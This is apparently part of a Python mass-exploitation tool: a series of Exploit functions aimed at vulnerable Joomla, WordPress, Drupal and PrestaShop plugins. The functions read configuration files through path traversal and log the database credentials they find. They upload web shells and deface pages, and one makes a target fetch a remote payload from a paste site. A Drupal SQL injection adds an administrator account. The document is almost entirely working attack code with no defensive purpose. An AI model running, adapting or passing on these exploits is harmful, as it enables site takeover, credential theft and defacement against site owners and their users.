def Exploit(site): try: Exp = 'http://' + site + \ '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'JConfig' in str(GetConfig.content): with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) Getuser = re.findall("user = '******';", str(GetConfig.content)) Getpass = re.findall("password = '******';", str(GetConfig.content)) Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') getSMTP.GETSmtpJoomConf(str(GetConfig.content)) except: return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla')
def Exploit(site): try: Exp = 'http://' + site + \ '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php' GetConfig = requests.get(Exp, timeout=5, headers=Headers) if 'JConfig' in str(GetConfig.content): with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) Getuser = re.findall("user = '******';", str(GetConfig.content)) Getpass = re.findall("password = '******';", str(GetConfig.content)) Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') getSMTP.GETSmtpJoomConf(str(GetConfig.content)) except: return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
def Exploit(site): try: defaceFile = { 'Filedata': ('vuln.txt', open('files/vuln.txt', 'rb'), 'text/html') } x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php', files=defaceFile, timeout=5, headers=Headers) if 'id="wpvimgres"' in x.content: uploader = site + '/wp-content/uploads/20' + year + '/' + month + '/vuln.txt' GoT = requests.get('http://' + uploader, timeout=5, headers=Headers) find = re.findall('<img src="http://(.*)" height="', x.content) GoT2 = requests.get('http://' + find[0], timeout=5, headers=Headers) if 'Vuln!!' in GoT.content: with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/uploads/20' + year + '/' + month + '/vuln.txt' + '\n') return printModule.returnYes(site, 'N/A', 'Viral-options', 'Wordpress') elif 'Vuln!!' in GoT2.content: with open('result/Index_results.txt', 'a') as writer: writer.write(site + find[0] + '\n') return printModule.returnYes(site, 'N/A', 'Viral-options', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress') except: return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress')
def Exploit(site): try: Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=10, headers=Headers) if 'GIF89a' in str(Checkvuln.content): PostDAta = {'dm_upload': ''} fileDeface = {'upfile': open(Jce_Deface_image, 'rb')} fileShell = {'upfile': open(pagelinesExploitShell, 'rb')} requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=10, headers=Headers) CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' + Jce_Deface_image.split('/')[1]) if 'GIF89a' in str(CheckIndex.content): requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=10, headers=Headers) requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' + pagelinesExploitShell.split('/')[1], timeout=10, headers=Headers) CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/wp-content/plugins/downloads-manager/upload/' + pagelinesExploitShell.split('/')[1] + '\n') with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') else: with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/plugins/downloads-manager/upload/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
def Exploit(site): try: Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', timeout=10, headers=Headers) if Check.status_code == 200: ShellFile = {'files[]': open(ShellPresta, 'rb')} requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', files=ShellFile, headers=Headers, timeout=10) CheckShell = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n') return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla') else: ShellFile = {'files[]': open(Jce_Deface_image, 'rb')} requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', files=ShellFile, headers=Headers, timeout=10) CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/' 'php/files/' + Jce_Deface_image.split('/')[1], timeout=10, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
def Exploit(site): try: fileDeface = {'userfile': open(Jce_Deface_image, 'rb')} Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php' Check = requests.get(Exp, timeout=10, headers=Headers) if 'class="inputbox" name="userfile"' in str(Check.content): Post = requests.post(Exp, files=fileDeface, timeout=10, headers=Headers) if 'has been successfully' or 'already exists' in str( Post.content): CheckIndex = requests.get( site + '/administrator/components/com_alberghi/' + Jce_Deface_image.split('/')[1], timeout=10, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write( site + '/administrator/components/com_alberghi/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
def Exploit(site): try: Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php', timeout=10, headers=Headers) if Check.status_code == 200 or Check.status_code == 500: IndeX = {'files[]': open(Jce_Deface_image, 'rb')} ShellFile = {'files[]': open(ShellPresta, 'rb')} Datapost = {'jpath': '../../../../'} requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php', files=ShellFile, data=Datapost, timeout=10, headers=Headers) CheckShell = requests.get('http://' + site + '/images/stories/up.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/stories/up.php\n') return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla') else: requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php', files=IndeX, data=Datapost, timeout=10, headers=Headers) CheckIndex = requests.get('http://' + site + '/images/stories/' + Jce_Deface_image.split('/')[1], headers=Headers, timeout=10) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/images/stories/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
def Exploit(site): try: Exp = 'http://' + site + \ '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'JConfig' in str(GetConfig.content): with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) Getuser = re.findall("user = '******';", str(GetConfig.content)) Getpass = re.findall("password = '******';", str(GetConfig.content)) Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') getSMTP.GETSmtpJoomConf(str(GetConfig.content)) except: return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla')
def Exploit(site): try: Exp = 'http://' + site + \ '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'DB_PASSWORD' in str(GetConfig.content): Attack(site) with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: #define('DB_USER', 'admin_soljica2'); Gethost = re.findall("'DB_HOST', '(.*)'", str(GetConfig.content)) Getuser = re.findall("'DB_USER', '(.*)'", str(GetConfig.content)) Getpass = re.findall("'DB_PASSWORD', '(.*)'", str(GetConfig.content)) Getdb = re.findall("'DB_NAME', '(.*)'", str(GetConfig.content)) cpanel.Check(site, Getuser[0], Getpass[0]) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[ 0] + '\n---------------------\n') return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress') except: return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
def Exploit(site): try: Exp = 'http://' + site + \ '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \ 'downloadAttachment.php?path=../../../../../wp-config.php' GetConfig = requests.get(Exp, timeout=5, headers=Headers) if 'DB_PASSWORD' in GetConfig.content: with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content) Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content) Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content) Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') except: return printModule.returnYes(site, 'N/A', 'wp-support-plus', 'Wordpress') return printModule.returnYes(site, 'N/A', 'wp-support-plus', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'wp-support-plus', 'Wordpress') except: return printModule.returnNo(site, 'N/A', 'wp-support-plus', 'Wordpress')
def Exploit(site): try: Exp = 'http://' + site + \ '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'DB_PASSWORD' in GetConfig.content: with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content) Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content) Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content) Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') except: return printModule.returnYes(site, 'N/A', 'ungallery Plugin', 'Wordpress') return printModule.returnYes(site, 'N/A', 'ungallery Plugin', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'ungallery Plugin', 'Wordpress') except: return printModule.returnNo(site, 'N/A', 'ungallery Plugin', 'Wordpress')
def Exploit(site): try: UserAgent = { 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' } fileDeface = {'file': open(index, 'rb')} post_data = { 'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'vuln.htm' } post_data2 = { 'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'vuln.htm' } url = "http://" + site + '/?gf_page=upload' requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5) requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5) CheckIndex = requests.get('http://' + site + '/_input_3_vuln.htm', timeout=5, headers=Headers) CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_vuln.htm', timeout=5, headers=Headers) if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/_input_3_vuln.htm' + '\n') return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress') elif 'Vuln!!' in str(CheckIndex2.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/_input_3_vuln.htm' + '\n') return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress')
def Exploit(site): try: fileindex = {'file': open(indeX, 'rb')} post_data = {"name": "vuln.php", "submit": "Upload"} Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component" GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers) if '"jsonrpc"' in str(GoT.content): requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=10, headers=Headers) requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=10, headers=Headers) Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=10, headers=Headers) Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=10, headers=Headers) Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=10, headers=Headers) CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(Check.content): if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/vuln.php' + '\n') if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'N/A', 'Com_adsmanager', 'Joomla') else: com_adsmanager_index(site) elif 'Vuln!!' in str(Check2.content): if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/vuln.php' + '\n') if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'N/A', 'Com_adsmanager', 'Joomla') else: com_adsmanager_index(site) elif 'Vuln!!' in str(Check3.content): if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/vuln.php' + '\n') if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'N/A', 'Com_adsmanager', 'Joomla') else: return com_adsmanager_index(site) else: return com_adsmanager_index(site) else: return com_adsmanager_index(site) except: return com_adsmanager_index(site)
def Exploit(site): try: Payload = 'https://hastebin.com/raw/etonipusij' exp = 'http://{}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={}'.format( site, Payload) requests.get(exp, timeout=10, headers=Headers) CheckShell = requests.get('http://{}/wp-admin/vuln.php'.format(site), timeout=10, headers=Headers) CheckIndex = requests.get('http://{}/wp-admin/vuln.htm'.format(site), timeout=10, headers=Headers) if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write('{}/wp-admin/vuln.htm\n'.format(site)) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( '{}/wp-admin/vuln.php?cmd=whoami;);\n'.format(site)) return printModule.returnYes(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress')
def Exploit(site): try: requests.post( 'http://' + site + '/index.php?option=com_b2jcontact&view=loader&type=uploader&' 'owner=component&bid=1&qqfile=/../../../vuln.php', data=payloadshell, timeout=10, headers=Headers) CheckSh = requests.get('http://' + site + '/components/com_b2jcontact/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckSh.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/components/com_b2jcontact/vuln.php?cmd=id') return printModule.returnYes(site, 'N/A', 'Com_b2jcontact', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
def Exploit(site): try: PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'} fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')} requests.post( 'http://' + site + '/administrator/components/com_simplephotogallery/lib/uploadFile.php', data=PostData, files=fil, timeout=10, headers=Headers) Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg', timeout=10, headers=Headers) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/tmp/vuln.php.xxxjpg?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
def Exploit(site): user = '******' password = '******' Hash = '$S$CTo9G7Lx2FC8odOl10OKshDIRREshaeCN8.zqA9I3PT0X4cqLUJ3mBEdyl6juLsRE3EBTKNzhGXKiz5rMulPcvmBhxbLNn1'[:55] POSTDATA = { 'name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,' '+MAX(uid)%2B1,+%27{}%27,+%27{}%27+FROM+users;insert+into+users_' 'roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+' '%27{}%27),+3);;#%20%20]'.format(user, Hash, user): 'test3&name[0]', 'name[0]': 'test', 'pass': '******', 'test2': 'test', 'form_build_id': '', 'form_id': 'user_login_block', 'op': 'Log+in' } agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} try: resp = requests.post('http://' + site + '/?q=node&destination=node', timeout=10, data=POSTDATA, headers=agent) if "mb_strlen() expects parameter 1" in str(resp.content): with open('result/AdminTakeover_results.txt', 'a') as writer: writer.write(site + '/user/login\n Username: {}\n' ' Password: {}\n------------------------------------------\n' .format(user, password)) return printModule.returnYes(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') else: return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') except: return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
def Exploit(site): try: PostFile = {'file': open('files/up.php', 'rb')} requests.post('http://' + site + '/modules/mod_simplefileuploadv1.3/elements/udd.php', files=PostFile, timeout=10, headers=Headers) CheckShell = requests.get( 'http://' + site + '/modules/mod_simplefileuploadv1.3/elements/up.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/modules/mod_simplefileuploadv1.3/elements/up.php' + '\n') return printModule.returnYes(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla')
def Exploit(site): try: Exp = site + '/modules/attributewizardpro_x/file_upload.php' FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} FileDataShell = {'userfile': open(ShellPresta, 'rb')} GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) if Jce_Deface_image.split('/')[1] in GoT.content: Index = GoT.content.split('|||')[0] IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) if 'GIF89a' in CheckIndex.content: with open('result/Index_results.txt', 'a') as writer: writer.write(IndexPath + '\n') Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers) if ShellPresta.split('/')[1] in GoT.content: Shell = Got2.content.split('|||')[0] ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell CheckShell = requests.get('http://' + ShellPath, timeout=5, headers=Headers) if 'Vuln!!' in CheckShell.content: with open('result/Shell_results.txt', 'a') as writer: writer.write(ShellPath + '\n') return printModule.returnYes(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
def Com_Jdownloads(site): try: fileindex = {'file_upload': (ZipJd, open(ZipJd, 'rb'), 'multipart/form-data'), 'pic_upload': (Jce_Deface_image, open(Jce_Deface_image, 'rb'), 'multipart/form-data')} post_data = { 'name': 'ur name', 'mail': '*****@*****.**', 'catlist': '1', 'filetitle': "lolz", 'description': "<p>zot</p>", '2d1a8f3bd0b5cf542e9312d74fc9766f': 1, 'send': 1, 'senden': "Send file", 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>", 'option': "com_jdownloads", 'view': "upload" } Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload' Got = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers) if '/upload_ok.png' in str(Got.content): checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + Jce_Deface_image.split('/')[1] Check = requests.get(checkUrl, timeout=10, headers=Headers) if 'GIF89a' in str(Check.content): with open('result/Index_results.txt', 'a') as writer: writer.write(checkUrl + '\n') return printModule.returnYes(site, 'N/A', 'Com_Jdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
def Exploit(site): Exl = site + '/modules/fieldvmegamenu/ajax/upload.php' try: Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) if Checkvuln.status_code == 200: FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')} FileDataShell = {'images[]': open(ShellPresta, 'rb')} uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + Jce_Deface_image.split('/')[1] uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + ShellPresta.split('/')[1] requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers) CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) if 'GIF89a' in CheckIndex.content: with open('result/Index_results.txt', 'a') as writer: writer.write(uploadedPathIndex + '\n') requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers) Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) if 'Vuln!!' in Checkshell.content: with open('result/Shell_results.txt', 'a') as writer: writer.write(uploadedPathShell + '\n') return printModule.returnYes(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
def Exploit(site): Exl = site + '/modules/wg24themeadministration/wg24_ajax.php' try: Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) if Checkvuln.status_code == 200: PostData = {'data': 'bajatax', 'type': 'pattern_upload'} FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')} FileDataShell = {'bajatax': open(ShellPresta, 'rb')} uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' \ + Jce_Deface_image.split('/')[1] uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' \ + ShellPresta.split('/')[1] requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers) CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) if 'GIF89a' in CheckIndex.content: with open('result/Index_results.txt', 'a') as writer: writer.write(uploadedPathIndex + '\n') requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5, headers=Headers) Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) if 'Vuln!!' in Checkshell.content: with open('result/Shell_results.txt', 'a') as writer: writer.write(uploadedPathShell + '\n') return printModule.returnYes(site, 'N/A', 'wg24themeadministration Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
def Exploit(site): IndeXText = 'Acik bulundu!' ency = { 'action': "revslider_ajax_action", 'client_action': "update_captions_css", 'data': "<body style='color: transparent;background-color: black'><center><h1>" "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>", } try: url = "http://" + site + \ "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" aa = requests.post(url, data=ency, timeout=10, headers=Headers) if 'succesfully' in str(aa.content): deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css' X = requests.get('http://' + deface, timeout=10, headers=Headers) if 'Vuln!!' in str(X.content): with open('result/Index_results.txt', 'a') as writer: writer.write(deface + '\n') return printModule.returnYes(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress')
def Exploit(site): try: PostData = {'path': '../../../tmp/'} fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')} requests.post( 'http://' + site + '/components/com_oziogallery/imagin/scripts_ralcr/filesystem' '/writeToFile.php', files=fil, data=PostData, headers=Headers, timeout=10) CheckShell = requests.get('http://' + site + '/tmp/up.php', headers=Headers, timeout=10) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id') return printModule.returnYes(site, 'N/A', 'Com_oziogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
